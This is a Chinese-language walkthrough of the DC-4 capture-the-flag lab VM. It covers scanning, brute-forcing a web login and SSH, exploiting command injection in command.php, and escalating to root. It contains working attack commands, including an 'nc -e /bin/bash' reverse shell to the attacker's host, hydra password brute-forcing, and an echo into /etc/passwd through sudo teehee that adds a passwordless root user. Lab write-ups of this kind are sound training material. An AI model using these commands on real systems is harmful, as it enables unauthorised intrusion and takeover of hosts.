【DC渗透系列DC-4】

旅行中的西瓜

主机发现

1. arp-scan -l

复制代码

1. ┌──(root㉿kali)-[~]
2. └─# arp-scan -l
3. Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
4. Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
5. 192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
6. 192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
7. 192.168.100.24  00:0c:29:36:b4:4e       VMware, Inc.
8. 192.168.100.254 00:50:56:fe:f1:0e       VMware, Inc.
10. 4 packets received by filter, 0 packets dropped by kernel
11. Ending arp-scan 1.10.0: 256 hosts scanned in 1.964 seconds (130.35 hosts/sec). 4 responded

复制代码

端口扫描

1. ┌──(root㉿kali)-[~]
2. └─# nmap -sS -sV -A -n 192.168.100.24
3. Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-03 21:13 EST
4. Nmap scan report for 192.168.100.24
5. Host is up (0.00015s latency).
6. Not shown: 998 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
9. | ssh-hostkey:
10. |   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
11. |   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
12. |_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
13. 80/tcp open  http    nginx 1.15.10
14. |_http-title: System Tools
15. |_http-server-header: nginx/1.15.10
16. MAC Address: 00:0C:29:36:B4:4E (VMware)
17. Device type: general purpose
18. Running: Linux 3.X|4.X
19. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
20. OS details: Linux 3.2 - 4.9
21. Network Distance: 1 hop
22. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
24. TRACEROUTE
25. HOP RTT     ADDRESS
26. 1   0.15 ms 192.168.100.24
28. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
29. Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

复制代码

浏览器访问

探测站点

1. ┌──(root㉿kali)-[~]
2. └─# whatweb -v 192.168.100.24
3. WhatWeb report for http://192.168.100.24
4. Status    : 200 OK
5. Title     : System Tools
6. IP        : 192.168.100.24
7. Country   : RESERVED, ZZ
9. Summary   : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password]
11. Detected Plugins:
12. [ HTML5 ]
13.         HTML version 5, detected by the doctype declaration
16. [ HTTPServer ]
17.         HTTP server header string. This plugin also attempts to
18.         identify the operating system from the server header.
20.         String       : nginx/1.15.10 (from server string)
22. [ PasswordField ]
23.         find password fields
25.         String       : password (from field name)
27. [ nginx ]
28.         Nginx (Engine-X) is a free, open-source, high-performance
29.         HTTP server and reverse proxy, as well as an IMAP/POP3
30.         proxy server.
32.         Version      : 1.15.10
33.         Website     : http://nginx.net/
35. HTTP Headers:
36.         HTTP/1.1 200 OK
37.         Server: nginx/1.15.10
38.         Date: Sun, 04 Feb 2024 02:17:35 GMT
39.         Content-Type: text/html; charset=UTF-8
40.         Transfer-Encoding: chunked
41.         Connection: close

复制代码

目录探测

敏感目录探测

1. ┌──(root㉿kali)-[~]
2. └─# nikto -h 192.168.100.24                                                                             
3. - Nikto v2.5.0
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.100.24
6. + Target Hostname:    192.168.100.24
7. + Target Port:        80
8. + Start Time:         2024-02-03 21:23:47 (GMT-5)
9. ---------------------------------------------------------------------------
10. + Server: nginx/1.15.10
11. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
12. + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
13. + No CGI Directories found (use '-C all' to force check all possible dirs)
14. + /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
15. + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
16. + 8102 requests: 0 error(s) and 4 item(s) reported on remote host
17. + End Time:           2024-02-03 21:24:04 (GMT-5) (17 seconds)
18. ---------------------------------------------------------------------------
19. + 1 host(s) tested

复制代码

1. ┌──(root㉿kali)-[~]
2. └─# dirsearch -u 192.168.100.24                                                                        
4.   _|. _ _  _  _  _ _|_    v0.4.3
5. (_||| _) (/_(_|| (_| )
7. Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
9. Output File: /root/reports/_192.168.100.24/_24-02-03_21-24-11.txt
11. Target: http://192.168.100.24/
13. [21:24:11] Starting:
14. [21:24:23] 302 -  704B  - /command.php  ->  index.php                       
15. [21:24:24] 301 -  170B  - /css  ->  http://192.168.100.24/css/              
16. [21:24:29] 403 -  556B  - /images/                                          
17. [21:24:29] 301 -  170B  - /images  ->  http://192.168.100.24/images/
18. [21:24:29] 403 -   15B  - /index.pHp                                       
19. [21:24:31] 302 -  206B  - /login.php  ->  index.php                        
20. [21:24:31] 302 -  163B  - /logout.php  ->  index.php                        
21.                                                                              
22. Task Completed     

复制代码

一开始想到sql注入但是没有找到注入点
爆破

抓包后送到intruder进行爆破用户admin得到密码happy

拿到密码登录

点击commad后发现可能存在任意命令执行漏洞

抓个包，发现ls -l命令是radio参数后的值

改成pwd后放包试试
存在漏洞，有远程代码执行漏洞 可以利用此漏洞进行反弹shell

开起监听

1. nc -lvvp 8888

复制代码

弹shell

1. nc+-e+/bin/bash+192.168.100.251+8888
2. nc -e /bin/bash 192.168.100.251 8888
3. # kali IP

复制代码

开启交互界面

1. python -c 'import pty;pty.spawn("/bin/sh")'

复制代码

在home里发现三个人物

只有cd到jim里有内容

backups里面有老密码，mbox不够权限

1. $ ls
2. ls
3. backups  mbox  test.sh
4. $ cd backups
5. cd backups
6. $ ls
7. ls
8. old-passwords.bak
9. $ cd ..
10. cd ..
11. $ cd mbox
12. cd mbox
13. /bin/sh: 53: cd: can't cd to mbox

复制代码

把里面的密码取出来存着先 命名为jim.txt

可以开始爆破了捏

直接使用jim参数用-l！

1. hydra -l jim -P jim.txt 192.168.100.24 ssh

复制代码

使用jim登录

查看mbox

1. jim@dc-4:~$ cat mbox
2. From root@dc-4 Sat Apr 06 20:20:04 2019
3. Return-path: <root@dc-4>
4. Envelope-to: jim@dc-4
5. Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
6. Received: from root by dc-4 with local (Exim 4.89)
7.         (envelope-from <root@dc-4>)
8.         id 1hCiQe-0000gc-EC
9.         for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
10. To: jim@dc-4
11. Subject: Test
12. MIME-Version: 1.0
13. Content-Type: text/plain; charset="UTF-8"
14. Content-Transfer-Encoding: 8bit
15. Message-Id: <E1hCiQe-0000gc-EC@dc-4>
16. From: root <root@dc-4>
17. Date: Sat, 06 Apr 2019 20:20:04 +1000
18. Status: RO
20. This is a test.

复制代码

是一封邮件
看看jim有没有root权限

1. jim@dc-4:~$ sudo -l
3. We trust you have received the usual lecture from the local System
4. Administrator. It usually boils down to these three things:
6.     #1) Respect the privacy of others.
7.     #2) Think before you type.
8.     #3) With great power comes great responsibility.
10. [sudo] password for jim:
11. Sorry, user jim may not run sudo on dc-4.

复制代码

很遗憾，没有
linux的邮件目录是/var/spool/mail
看到刚才那封邮件那就查看一下是否存在该目录
发现charls密码^xHhA&hvim0y

转换用户，发现一个teehee用户可以使用root无密码权限

我们可以使用keehee添加root权限用户

1. echo "yiyi::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  

复制代码

teehee可以通过修改该文件达到添加用户的效果，文件格式为

1. 注册名:口令:用户标识号:组标识号:用户名:用户主目录:命令解析程序

复制代码

口令为x即代表存放有密码，为空即代表没有密码，识标号为0代表root权限

1. su yiyi
2. whoami

复制代码

进入root目录获取flag

来源:https://www.cnblogs.com/p1ggy/p/18007374
免责声明：由于采集信息均来自互联网，如果侵犯了您的权益，请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容，谢谢合作！